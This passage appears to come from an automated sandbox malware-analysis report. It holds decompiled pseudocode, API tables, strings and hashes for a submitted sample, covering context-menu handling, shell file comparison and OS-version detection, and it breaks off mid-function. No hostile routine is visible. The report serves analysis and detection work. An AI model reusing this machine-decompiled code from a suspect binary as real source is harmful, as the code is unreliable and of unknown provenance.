															 *0xe17a64(_t310, _v60 << 2);
															_t355 =  *_t359();
															_v68 = _t355;
															__eflags = _t355;
															if(__eflags == 0) {
																goto L97;
															} else {
																E00DDFBE0(_t347,  &_v132, 0, 0x3c);
																_v64 = _v100;
																_t206 = _v56;
																_v132 = 4;
																__eflags = _t206;
																if(_t206 >= 0) {
																	_v128 = _t206;
																	_t254 = SendMessageA( *(_t347 + 0x20), 0x1005, 0,  &_v132);
																	__eflags = _t254;
																	if(_t254 != 0) {
																		_t329 = _v100;
																		_v64 = _t329;
																		 *_t355 =  *((intOrPtr*)(_t329 + 8));
																	}
																	_t206 = _v56;
																}
																_t362 =  !_t206 >> 0x1f;
																while(1) {
																	_t340 = _v60;
																	__eflags = _t362 - _t340;
																	if(_t362 >= _t340) {
																		break;
																	}
																	_t298 = SendMessageA( *(_t347 + 0x20), 0x100c, _t298, 2);
																	__eflags = _t298 - _v56;
																	if(_t298 == _v56) {
																		_t362 = _t362 - 1;
																		__eflags = _t362;
																	} else {
																		_v128 = _t298;
																		_t251 = SendMessageA( *(_t347 + 0x20), 0x1005, 0,  &_v132);
																		__eflags = _t251;
																		if(_t251 != 0) {
																			__eflags = _v64;
																			_t341 = _v100;
																			 *((intOrPtr*)(_v68 + _t362 * 4)) =  *((intOrPtr*)(_t341 + 8));
																			if(_v64 == 0) {
																				_v64 = _t341;
																			}
																		}
																	}
																	_t362 = _t362 + 1;
																	__eflags = _t362;
																}
																_t299 = _v68;
																__eflags =  *_t299;
																if( *_t299 != 0) {
																	_t313 =  *(_t347 + 0x154);
																	 *0xe17a64(_t313,  *(_t347 + 0x20), _t340, _t299, 0xe3eeac, 0,  &_v72);
																	_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t313 + 0x28))))();
																	__eflags = _t214;
																	if(_t214 >= 0) {
																		_t315 = _v72;
																		 *0xe17a64(_t315, 0xe3ee9c, 0xe870c8);
																		_t217 =  *((intOrPtr*)( *((intOrPtr*)( *_t315))))();
																		__eflags = _t217;
																		if(_t217 >= 0) {
																			_t300 = CreatePopupMenu();
																			_v56 = _t300;
																			__eflags = _t300;
																			if(_t300 != 0) {
																				_t340 =  *0xe870c8; // 0x0
																				_t368 =  *((intOrPtr*)( *_t340 + 0xc));
																				_t322 = _t368;
																				 *0xe17a64(_t340, _t300, 0, 1, 0x7fff, 4);
																				_t226 =  *_t368();
																				__eflags = _t226;
																				if(_t226 >= 0) {
																					_t369 = 0;
																					_t301 = TrackPopupMenu(_t300, 0x102, _v0, _a4, 0,  *(_t347 + 0x20), 0);
																					__eflags = _t301;
																					if(_t301 != 0) {
																						__eflags = _v60 - 1;
																						if(_v60 != 1) {
																							L84:
																							_v52 = 0x24;
																							_v48 = _t369;
																							_t229 = E00CB277F(_t301, _t322, _t340, GetParent( *(_t347 + 0x20)));
																							__eflags = _t229;
																							if(_t229 != 0) {
																								_v44 =  *((intOrPtr*)(_t229 + 0x20));
																							} else {
																								_v44 = _t369;
																							}
																							_t323 = _v72;
																							_t157 = _t301 - 1; // -1
																							_v40 = _t157;
																							_v36 = _t369;
																							_v32 = _t369;
																							_v24 = _t369;
																							_v20 = _t369;
																							_v28 = 1;
																							_t370 =  *((intOrPtr*)( *_t323 + 0x10));
																							_t324 = _t370;
																							 *0xe17a64(_t323,  &_v52);
																							_t235 =  *_t370();
																							__eflags = _t235;
																							if(_t235 >= 0) {
																								_t237 = E00CB277F(_t301, _t324, _t340, GetParent( *(_t347 + 0x20)));
																								__eflags = _t237;
																								if(_t237 != 0) {
																									SendMessageA( *(E00CB277F(_t301, _t324, _t340, GetParent( *(_t347 + 0x20))) + 0x20),  *0xe885cc, _t301, 0);
																								}
																							}
																						} else {
																							_t241 = GetMenuDefaultItem(_v56, 0, 0);
																							__eflags = _t301 - _t241;
																							if(_t301 != _t241) {
																								goto L84;
																							} else {
																								_t325 =  *(_t347 + 0x154);
																								_v60 = 0x20000000;
																								_t371 =  *_t325;
																								_t322 =  *((intOrPtr*)(_t371 + 0x24));
																								 *0xe17a64(_t325, 1, _v64 + 8,  &_v60);
																								 *((intOrPtr*)(_t371 + 0x24))();
																								__eflags = _v60 & 0x20000000;
																								if((_v60 & 0x20000000) == 0) {
																									_t369 = 0;
																									__eflags = 0;
																									goto L84;
																								} else {
																									 *0xe17a64(_v64);
																									 *((intOrPtr*)( *((intOrPtr*)( *_t347 + 0x188))))();
																								}
																							}
																						}
																					}
																				}
																			}
																			_t319 =  *0xe870c8; // 0x0
																			__eflags = _t319;
																			if(_t319 != 0) {
																				 *0xe17a64(_t319);
																				 *((intOrPtr*)( *((intOrPtr*)( *_t319 + 8))))();
																				 *0xe870c8 =  *0xe870c8 & 0x00000000;
																				__eflags =  *0xe870c8;
																			}
																			_t299 = _v68;
																		}
																		_t218 = _v72;
																		 *0xe17a64(_t218);
																		 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 8))))();
																	}
																}
																_t208 =  *0xe885c8; // 0x0
																_t209 =  *((intOrPtr*)(_t208 + 4));
																 *0xe17a64(_t209, _t299);
																_t188 =  *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0x14))))();
																goto L95;
															}
														}
													}
												}
											}
										} else {
											_t188 = E00CB236A(_t298, _t304, __eflags);
											goto L96;
										}
									}
								}
							} else {
								__eflags = _t298;
								if(__eflags == 0) {
									goto L46;
								} else {
									_t349 = 0;
									_v828 = 0;
									_v824 = 0;
									_v820 = 0;
									_v816 = 0;
									_v812 = 0;
									_v808 = 0;
									_v1124 = 0;
									_v1120 = 0;
									_v1116 = 0;
									_v1112 = 0;
									_v1108 = 0;
									_v1104 = 0;
									_t265 = _a8;
									__eflags = _t265;
									if(_t265 == 0) {
										_t332 =  *_t340;
										 *0xe17a64(_t332, 0,  *((intOrPtr*)(_t340 + 8)),  *((intOrPtr*)(_t298 + 8)));
										_t268 =  *((intOrPtr*)( *((intOrPtr*)( *_t332 + 0x1c))))();
										__eflags = _t268;
										if(_t268 >= 0) {
											_t349 = _t268;
											goto L45;
										} else {
											_t269 = 0;
											__eflags = 0;
										}
									} else {
										_t271 = _t265 - 1;
										__eflags = _t271;
										if(_t271 == 0) {
											L15:
											_t272 =  &_v272;
											__imp__SHGetPathFromIDListA( *(_t340 + 4), _t272);
											__eflags = _t272;
											if(_t272 == 0) {
												L40:
												_t349 = _t349 | 0xffffffff;
											} else {
												_t275 = E00CAF4DD(_t340,  &_v272,  &_v828, _t349);
												__eflags = _t275;
												if(_t275 == 0) {
													goto L40;
												} else {
													_t276 =  &_v532;
													__imp__SHGetPathFromIDListA( *(_t298 + 4), _t276);
													__eflags = _t276;
													if(_t276 == 0) {
														L39:
														_t349 = 1;
													} else {
														_t279 = E00CAF4DD(_t340,  &_v532,  &_v1124, _t349);
														__eflags = _t279;
														if(_t279 == 0) {
															goto L39;
														} else {
															_t340 = 1;
															__eflags = _a8 - 1;
															if(_a8 != 1) {
																_t336 = _v1112;
																_t280 = _v1116;
																__eflags = _v816 - _t336;
																if(__eflags > 0) {
																	goto L29;
																} else {
																	if(__eflags < 0) {
																		goto L40;
																	} else {
																		__eflags = _v820 - _t280;
																		if(_v820 < _t280) {
																			goto L40;
																		} else {
																			__eflags = _v816 - _t336;
																			if(__eflags >= 0) {
																				if(__eflags > 0) {
																					goto L29;
																				} else {
																					__eflags = _v820 - _t280;
																					goto L28;
																				}
																			}
																		}
																	}
																}
															} else {
																__eflags = _v796 & 0x00000010;
																if((_v796 & 0x00000010) != 0) {
																	goto L40;
																} else {
																	__eflags = _v1092 & 0x00000010;
																	if((_v1092 & 0x00000010) != 0) {
																		L29:
																		_t349 = _t340;
																	} else {
																		_t337 = _v1096;
																		_t281 = _v1100;
																		__eflags = _v800 - _t337;
																		if(__eflags > 0) {
																			goto L29;
																		} else {
																			if(__eflags < 0) {
																				goto L40;
																			} else {
																				__eflags = _v804 - _t281;
																				if(_v804 < _t281) {
																					goto L40;
																				} else {
																					__eflags = _v800 - _t337;
																					if(__eflags >= 0) {
																						if(__eflags > 0) {
																							goto L29;
																						} else {
																							__eflags = _v804 - _t281;
																							L28:
																							if(__eflags > 0) {
																								goto L29;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										} else {
											_t282 = _t271 - 1;
											__eflags = _t282;
											if(_t282 == 0) {
												_t284 = SHGetFileInfoA( *(_t340 + 4), 0,  &_v1828, 0x160, 0x408);
												__eflags = _t284;
												if(_t284 != 0) {
													_t286 = SHGetFileInfoA( *(_t298 + 4), 0,  &_v1476, 0x160, 0x408);
													__eflags = _t286;
													if(_t286 != 0) {
														_t349 = lstrcmpiA( &(_v1828.szTypeName),  &(_v1476.szTypeName));
													}
												}
											} else {
												__eflags = _t282 == 1;
												if(_t282 == 1) {
													goto L15;
												}
											}
										}
										L45:
										_t269 = _t349;
									}
									_pop(_t350);
									_pop(_t375);
									__eflags = _v12 ^ _t379;
									_pop(_t302);
									return E00DDCBCE(_t269, _t302, _v12 ^ _t379, _t340, _t350, _t375);
								}
							}
						} else {
							 *0xe17a64(_t339,  *((intOrPtr*)(_t345 + 8)), 0, 0xe3eebc, __ecx + 0x154);
							_t353 =  *((intOrPtr*)( *((intOrPtr*)( *_t339 + 0x14))))();
							_t179 = 0;
							L5:
							 *((intOrPtr*)(_t296 + 0x168)) = _t179;
							if(_t353 >= 0 && _t345 != 0) {
								_t305 =  *0xe885c8; // 0x0
								 *((intOrPtr*)(_t296 + 0x158)) = E00D1E0B1(_t296, _t305, _t345, _t353,  *((intOrPtr*)(_t345 + 4)));
							}
							return _t353;
						}
					}
				}
			}

0x00cd3141
0x00cd3142
0x00cd3144
0x00cd3146
0x00cd3147
0x00cd3148
0x00cd314b
0x00cd3153
0x00cd3186
0x00cd3186
0x00cd318d
0x00cd3193
0x00cd3197
0x00cd3197
0x00000000
0x00cd3155
0x00cd3155
0x00cd3159
0x00000000
0x00cd315b
0x00cd315e
0x00cd31c3
0x00cd31c8
0x00cd31ca
0x00cd31cc
0x00cd31d2
0x00cd31d9
0x00cd31dc
0x00cd31df
0x00cd31e0
0x00cd31e3
0x00cd31e4
0x00cd31e5
0x00cd31e7
0x00cd3405
0x00cd3405
0x00cd340a
0x00cd340b
0x00cd340c
0x00cd3411
0x00cd3418
0x00cd341b
0x00cd3420
0x00cd3421
0x00cd3423
0x00cd3424
0x00cd3426
0x00cd3429
0x00cd3808
0x00cd3808
0x00cd380d
0x00cd380e
0x00cd3811
0x00cd3815
0x00cd3817
0x00cd381c
0x00cd381f
0x00cd3830
0x00cd3830
0x00cd3830
0x00cd3821
0x00cd3823
0x00cd3828
0x00cd382a
0x00000000
0x00cd382c
0x00cd382c
0x00cd382c
0x00cd382a
0x00cd3835
0x00cd342f
0x00cd342f
0x00cd3435
0x00cd37f8
0x00cd37fb
0x00cd37fc
0x00cd37fe
0x00cd3805
0x00cd343b
0x00cd343b
0x00cd3441
0x00cd344d
0x00cd3453
0x00000000
0x00cd3459
0x00cd3459
0x00cd3464
0x00cd346a
0x00cd346d
0x00cd3470
0x00cd3473
0x00cd3476
0x00cd3479
0x00cd347b
0x00cd34e2
0x00cd34e5
0x00cd34ec
0x00cd34ef
0x00cd34f8
0x00cd3509
0x00cd350f
0x00cd3513
0x00000000
0x00cd3519
0x00cd351c
0x00000000
0x00cd351c
0x00cd347d
0x00cd347d
0x00cd347f
0x00000000
0x00cd3481
0x00cd3481
0x00cd3483
0x00cd37f7
0x00cd37f7
0x00000000
0x00cd3489
0x00cd3489
0x00cd348d
0x00cd348f
0x00cd34a0
0x00cd34a2
0x00cd34a4
0x00cd34a4
0x00cd34a4
0x00cd34ad
0x00cd34b4
0x00cd34b7
0x00cd34ba
0x00cd34bd
0x00cd34c2
0x00cd34c4
0x00cd34c9
0x00cd34d0
0x00cd34da
0x00cd34da
0x00cd351f
0x00cd351f
0x00cd3524
0x00cd3529
0x00cd3534
0x00cd3536
0x00cd353e
0x00cd3540
0x00cd3543
0x00cd3545
0x00000000
0x00cd354b
0x00cd3553
0x00cd355e
0x00cd3561
0x00cd3564
0x00cd356b
0x00cd356d
0x00cd356f
0x00cd3580
0x00cd3586
0x00cd3588
0x00cd358a
0x00cd358d
0x00cd3593
0x00cd3593
0x00cd3595
0x00cd3595
0x00cd359c
0x00cd35ed
0x00cd35ed
0x00cd35f0
0x00cd35f2
0x00000000
0x00000000
0x00cd35b2
0x00cd35b4
0x00cd35b7
0x00cd35eb
0x00cd35eb
0x00cd35b9
0x00cd35bc
0x00cd35ca
0x00cd35d0
0x00cd35d2
0x00cd35d4
0x00cd35d8
0x00cd35e1
0x00cd35e4
0x00cd35e6
0x00cd35e6
0x00cd35e4
0x00cd35d2
0x00cd35ec
0x00cd35ec
0x00cd35ec
0x00cd35f4
0x00cd35f7
0x00cd35fa
0x00cd3600
0x00cd361e
0x00cd3624
0x00cd3626
0x00cd3628
0x00cd362e
0x00cd3642
0x00cd3648
0x00cd364a
0x00cd364c
0x00cd3658
0x00cd365a
0x00cd365d
0x00cd365f
0x00cd3665
0x00cd367a
0x00cd367d
0x00cd367f
0x00cd3685
0x00cd3687
0x00cd3689
0x00cd368f
0x00cd36a8
0x00cd36aa
0x00cd36ac
0x00cd36b2
0x00cd36b6
0x00cd3717
0x00cd371a
0x00cd3721
0x00cd372b
0x00cd3730
0x00cd3732
0x00cd373c
0x00cd3734
0x00cd3734
0x00cd3734
0x00cd373f
0x00cd3742
0x00cd3745
0x00cd3748
0x00cd374b
0x00cd374e
0x00cd3751
0x00cd3754
0x00cd375d
0x00cd3765
0x00cd3767
0x00cd376d
0x00cd376f
0x00cd3771
0x00cd377d
0x00cd3782
0x00cd3784
0x00cd37a1
0x00cd37a1
0x00cd3784
0x00cd36b8
0x00cd36bd
0x00cd36c3
0x00cd36c5
0x00000000
0x00cd36c7
0x00cd36c7
0x00cd36d7
0x00cd36de
0x00cd36e4
0x00cd36e7
0x00cd36ed
0x00cd36f0
0x00cd36f7
0x00cd3715
0x00cd3715
0x00000000
0x00cd36f9
0x00cd3706
0x00cd370e
0x00cd370e
0x00cd36f7
0x00cd36c5
0x00cd36b6
0x00cd36ac
0x00cd3689
0x00cd37a7
0x00cd37ad
0x00cd37af
0x00cd37b9
0x00cd37bf
0x00cd37c1
0x00cd37c1
0x00cd37c1
0x00cd37c8
0x00cd37c8
0x00cd37cb
0x00cd37d6
0x00cd37dc
0x00cd37dc
0x00cd3628
0x00cd37de
0x00cd37e4
0x00cd37ef
0x00cd37f5
0x00000000
0x00cd37f5
0x00cd3545
0x00cd3483
0x00cd347f
0x00cd347b
0x00cd3443
0x00cd3443
0x00000000
0x00cd3443
0x00cd3441
0x00cd3435
0x00cd31ed
0x00cd31ed
0x00cd31ef
0x00000000
0x00cd31f5
0x00cd31f8
0x00cd31fa
0x00cd3200
0x00cd3206
0x00cd320c
0x00cd3212
0x00cd3218
0x00cd321e
0x00cd3224
0x00cd322a
0x00cd3230
0x00cd3236
0x00cd323c
0x00cd3242
0x00cd3242
0x00cd3244
0x00cd33ce
0x00cd33df
0x00cd33e5
0x00cd33e7
0x00cd33e9
0x00cd33fe
0x00000000
0x00cd33eb
0x00cd33eb
0x00cd33eb
0x00cd33eb
0x00cd324a
0x00cd324a
0x00cd324a
0x00cd324d
0x00cd3261
0x00cd3261
0x00cd326b
0x00cd3271
0x00cd3273
0x00cd33c9
0x00cd33c9
0x00cd3279
0x00cd3288
0x00cd328d
0x00cd328f
0x00000000
0x00cd3295
0x00cd3295
0x00cd329f
0x00cd32a5
0x00cd32a7
0x00cd33c4
0x00cd33c6
0x00cd32ad
0x00cd32bc
0x00cd32c1
0x00cd32c3
0x00000000
0x00cd32c9
0x00cd32cb
0x00cd32cc
0x00cd32cf
0x00cd338d
0x00cd3393
0x00cd3399
0x00cd339f
0x00000000
0x00cd33a1
0x00cd33a1
0x00000000
0x00cd33a3
0x00cd33a3
0x00cd33a9
0x00000000
0x00cd33ab
0x00cd33ab
0x00cd33b1
0x00cd33b3
0x00000000
0x00cd33b9
0x00cd33b9
0x00000000
0x00cd33b9
0x00cd33b3
0x00cd33b1
0x00cd33a9
0x00cd33a1
0x00cd32d5
0x00cd32d5
0x00cd32dc
0x00000000
0x00cd32e2
0x00cd32e2
0x00cd32e9
0x00cd332b
0x00cd332b
0x00cd32eb
0x00cd32eb
0x00cd32f1
0x00cd32f7
0x00cd32fd
0x00000000
0x00cd32ff
0x00cd32ff
0x00000000
0x00cd3305
0x00cd3305
0x00cd330b
0x00000000
0x00cd3311
0x00cd3311
0x00cd3317
0x00cd331d
0x00000000
0x00cd331f
0x00cd331f
0x00cd3325
0x00cd3325
0x00000000
0x00000000
0x00cd3325
0x00cd331d
0x00cd3317
0x00cd330b
0x00cd32ff
0x00cd32fd
0x00cd32e9
0x00cd32dc
0x00cd32cf
0x00cd32c3
0x00cd32a7
0x00cd328f
0x00cd324f
0x00cd324f
0x00cd324f
0x00cd3252
0x00cd3348
0x00cd334e
0x00cd3350
0x00cd3367
0x00cd336d
0x00cd336f
0x00cd3389
0x00cd3389
0x00cd336f
0x00cd3258
0x00cd3258
0x00cd325b
0x00000000
0x00000000
0x00cd325b
0x00cd3252
0x00cd3401
0x00cd3401
0x00cd3401
0x00cd33f0
0x00cd33f1
0x00cd33f2
0x00cd33f4
0x00cd33fb
0x00cd33fb
0x00cd31ef
0x00cd3160
0x00cd3178
0x00cd3180
0x00cd3182
0x00cd3198
0x00cd3198
0x00cd31a0
0x00cd31a9
0x00cd31b4
0x00cd31b4
0x00cd31c0
0x00cd31c0
0x00cd315e
0x00cd3159

APIs

SHGetDesktopFolder.SHELL32(?,?,?,80004005,?,00CD2878,00000000,?,?,00000004), ref: 00CD318D
SHGetPathFromIDListA.SHELL32(?,?,00000000), ref: 00CD326B
SHGetPathFromIDListA.SHELL32(?,?), ref: 00CD329F
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000408,00000000), ref: 00CD3348
SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000408), ref: 00CD3367
lstrcmpiA.KERNEL32(?,?), ref: 00CD3383
SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00CD3464
SendMessageA.USER32(?,0000100C,?,00000002), ref: 00CD349A
ClientToScreen.USER32(?,?), ref: 00CD34DA
ScreenToClient.USER32 ref: 00CD34EF
SendMessageA.USER32(?,00001012,00000000,?), ref: 00CD3509
SendMessageA.USER32(?,00001005,00000000,00000004), ref: 00CD3580
SendMessageA.USER32(?,0000100C,?,00000002), ref: 00CD35AC
SendMessageA.USER32(?,00001005,00000000,00000004), ref: 00CD35CA
CreatePopupMenu.USER32 ref: 00CD3652
TrackPopupMenu.USER32(00000000,00000102,?,?,00000000,?,00000000), ref: 00CD36A2
GetMenuDefaultItem.USER32 ref: 00CD36BD
GetParent.USER32(?), ref: 00CD3724
GetParent.USER32(?), ref: 00CD3776
GetParent.USER32(?), ref: 00CD3789
SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00CD37A1

Strings

$, xrefs: 00CD371A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$MenuParent$ClientFileFromInfoListPathPopupScreen$CreateDefaultDesktopFolderItemTracklstrcmpi
String ID: $
API String ID: 312081018-3993045852
Opcode ID: b4e40e45b8066d12dae8d035dabc2c72d57f673382c5d816e508039547af0a2c
Instruction ID: 677f9edfae902170024280598344ea4e4bff433f6e7cbfa057bd05f1b4e70d8e
Opcode Fuzzy Hash: b4e40e45b8066d12dae8d035dabc2c72d57f673382c5d816e508039547af0a2c
Instruction Fuzzy Hash: 15228DB1A00259AFCB118F65DD84A9EBBB9FF48710F10416AEA19E73A0DB709F40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6C70 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00CA6C70(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v10;
				struct _OSVERSIONINFOA _v164;
				struct _SYSTEM_INFO _v200;
				void* __esi;
				signed int _t16;
				void* _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				intOrPtr _t31;
				void* _t34;
				void* _t42;
				void* _t43;
				void* _t44;
				signed int _t45;

				_t43 = __edi;
				_t34 = __ebx;
				_t16 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t16 ^ _t45;
				_t44 = __ecx;
				GetSystemInfo( &_v200);
				_v164.dwOSVersionInfoSize = 0x9c;
				E00CA1DDE("unknown OperatingSystem.");
				if(GetVersionExA( &_v164) == 0) {
					L33:
					return E00DDCBCE(_t21, _t34, _v8 ^ _t45, _t42, _t43, _t44);
				}
				_t24 = _v164.dwMajorVersion - 4;
				if(_t24 == 0) {
					_t21 = _v164.dwMinorVersion;
					if(_t21 == 0) {
						if(_v164.dwPlatformId != 2) {
							if(_v164.dwPlatformId != 1) {
								goto L33;
							}
							_push("Microsoft Windows 95");
							L31:
							L32:
							_t21 = E00CA1DDE();
							goto L33;
						}
						_push("Microsoft Windows NT 4.0");
						goto L31;
					}
					if(_t21 == 0xa) {
						_push("Microsoft Windows 98");
						goto L31;
					}
					if(_t21 != 0x5a) {
						goto L33;
					}
					_push("Microsoft Windows Me");
					goto L31;
				}
				_t25 = _t24 - 1;
				if(_t25 == 0) {
					_t27 = _v164.dwMinorVersion;
					if(_t27 == 0) {
						_push("Microsoft Windows 2000");
						goto L31;
					}
					_t28 = _t27 - 1;
					if(_t28 == 0) {
						_push("Microsoft Windows XP");
						goto L31;
					}
					_t21 = _t28 != 1;
					if(_t28 != 1) {
						goto L33;
					}
					if(_v10 != 1 || _v200.dwOemId != 9) {
						if(GetSystemMetrics(0x59) != 0) {
							if(GetSystemMetrics(0x59) == 0) {
								goto L33;
							}
							_push("Microsoft Windows Server 2003 R2");
							goto L31;
						}
						_push("Microsoft Windows Server 2003");
					} else {
						_push("Microsoft Windows XP Professional x64 Edition");
					}
					goto L31;
				}
				_t21 = _t25 != 1;
				if(_t25 != 1) {
					goto L33;
				}
				_t31 = _v164.dwMinorVersion;
				if(_t31 == 0) {
					_t33 =  !=  ? "Microsoft Windows Server 2008" : "Microsoft Windows Vista";
					_push( !=  ? "Microsoft Windows Server 2008" : "Microsoft Windows Vista");
					goto L31;
				}
				_t21 = _t31 != 1;
				if(_t31 != 1) {
					goto L33;
				}
				if(_v10 != 1) {
					_push("Microsoft Windows Server 2008 R2");
				} else {
					_push("Microsoft Windows 7");
				}
				goto L32;
			}

0x00ca6c70
0x00ca6c70
0x00ca6c79
0x00ca6c80
0x00ca6c8a
0x00ca6c8d
0x00ca6c9a
0x00ca6ca4
0x00ca6cb8
0x00ca6dcd
0x00ca6dd9
0x00ca6dd9
0x00ca6cc4
0x00ca6cc7
0x00ca6d86
0x00ca6d8e
0x00ca6daf
0x00ca6dbf
0x00000000
0x00000000
0x00ca6dc1
0x00ca6dc6
0x00ca6dc8
0x00ca6dc8
0x00000000
0x00ca6dc8
0x00ca6db1
0x00000000
0x00ca6db1
0x00ca6d93
0x00ca6da1
0x00000000
0x00ca6da1
0x00ca6d98
0x00000000
0x00000000
0x00ca6d9a
0x00000000
0x00ca6d9a
0x00ca6ccd
0x00ca6cd0
0x00ca6d28
0x00ca6d2b
0x00ca6d7f
0x00000000
0x00ca6d7f
0x00ca6d2d
0x00ca6d30
0x00ca6d78
0x00000000
0x00ca6d78
0x00ca6d32
0x00ca6d35
0x00000000
0x00000000
0x00ca6d3f
0x00ca6d5c
0x00ca6d6f
0x00000000
0x00000000
0x00ca6d71
0x00000000
0x00ca6d71
0x00ca6d5e
0x00ca6d4b
0x00ca6d4b
0x00ca6d4b
0x00000000
0x00ca6d3f
0x00ca6cd2
0x00ca6cd5
0x00000000
0x00000000
0x00ca6ce1
0x00ca6ce4
0x00ca6d19
0x00ca6d1c
0x00000000
0x00ca6d1c
0x00ca6ce6
0x00ca6ce9
0x00000000
0x00000000
0x00ca6cf5
0x00ca6d01
0x00ca6cf7
0x00ca6cf7
0x00ca6cf7
0x00000000

APIs

GetSystemInfo.KERNEL32(?,C:\DownLoad-Helper), ref: 00CA6C8D
GetVersionExA.KERNEL32(0000009C,unknown OperatingSystem.), ref: 00CA6CB0

Strings

Microsoft Windows Me, xrefs: 00CA6D9A
Microsoft Windows Server 2003 R2, xrefs: 00CA6D71
Microsoft Windows XP, xrefs: 00CA6D78
Microsoft Windows 95, xrefs: 00CA6DC1
Microsoft Windows 7, xrefs: 00CA6CF7
Microsoft Windows Server 2008 R2, xrefs: 00CA6D01
Microsoft Windows 2000, xrefs: 00CA6D7F
Microsoft Windows 98, xrefs: 00CA6DA1
Microsoft Windows NT 4.0, xrefs: 00CA6DB1
Microsoft Windows Server 2008, xrefs: 00CA6D14
unknown OperatingSystem., xrefs: 00CA6C93
Microsoft Windows Vista, xrefs: 00CA6D0F, 00CA6D1C
Microsoft Windows Server 2003, xrefs: 00CA6D5E
Microsoft Windows XP Professional x64 Edition, xrefs: 00CA6D4B
C:\DownLoad-Helper, xrefs: 00CA6C83

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InfoSystemVersion
String ID: C:\DownLoad-Helper$Microsoft Windows 2000$Microsoft Windows 7$Microsoft Windows 95$Microsoft Windows 98$Microsoft Windows Me$Microsoft Windows NT 4.0$Microsoft Windows Server 2003$Microsoft Windows Server 2003 R2$Microsoft Windows Server 2008$Microsoft Windows Server 2008 R2$Microsoft Windows Vista$Microsoft Windows XP$Microsoft Windows XP Professional x64 Edition$unknown OperatingSystem.
API String ID: 1934062620-2074074911
Opcode ID: 793cdcfe1872018f670898a906466ed690e04afc2d6516391674203bb0507867
Instruction ID: fb4b96e434dad2308182245d236a4316b7f03434a1e47d29a60e66f2a607b958
Opcode Fuzzy Hash: 793cdcfe1872018f670898a906466ed690e04afc2d6516391674203bb0507867
Instruction Fuzzy Hash: C131A630F4535F9ADF708E799E09BA87674AB03B8CF1C0195E015B22C1CAA18F88D712

Uniqueness

Uniqueness Score: -1.00%

Function 00D09483 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 341
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00D09483(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t116;
				signed int _t119;
				short _t124;
				signed int _t127;
				signed int _t129;
				signed int _t132;
				signed int _t145;
				void* _t149;
				void* _t155;
				signed int _t159;
				signed int _t163;
				void* _t174;
				signed int _t183;
				intOrPtr _t189;
				signed int _t195;
				long _t196;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				void* _t218;
				int _t221;
				void* _t237;
				void* _t238;
				void* _t240;

				_t218 = __edx;
				_t184 = __ecx;
				_push(0x84);
				E00DDD55F(0xe0c306, __ebx, __edi, __esi);
				_t183 = __ecx;
				 *(_t237 - 0x78) = __ecx;
				_t116 =  *((intOrPtr*)(_t237 + 8));
				_t221 = 1;
				 *((intOrPtr*)(_t237 - 0x74)) = _t116;
				_t229 =  *(_t116 + 4);
				if(_t229 == 0x200 || _t229 == 0xa0 || _t229 == 0x202 || _t229 == 0x205 || _t229 == 0x208) {
					if(GetKeyState(_t221) < 0 || GetKeyState(2) < 0) {
						L49:
						_t116 =  *((intOrPtr*)(_t237 - 0x74));
						goto L50;
					} else {
						_t124 = GetKeyState(4);
						_t250 = _t124;
						if(_t124 < 0) {
							goto L49;
						} else {
							_t221 = E00CACF21(_t183, _t184, _t221, _t229, _t250);
							 *(_t237 - 0x80) = _t221;
							_push( *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)))));
							while(1) {
								_t127 = E00CB277F(_t183, _t184, _t218);
								if(_t127 == 0) {
									break;
								}
								__eflags =  *(_t127 + 0x60) & 0x00000401;
								if(( *(_t127 + 0x60) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t127 + 0x20)));
									continue;
								}
							}
							if(_t127 == _t183) {
								_t230 =  *(_t237 - 0x78);
								_t183 =  *(_t221 + 0x3c);
								 *(_t237 - 0x7c) = E00CB2A4F(_t230);
								__eflags = _t183;
								if(__eflags == 0) {
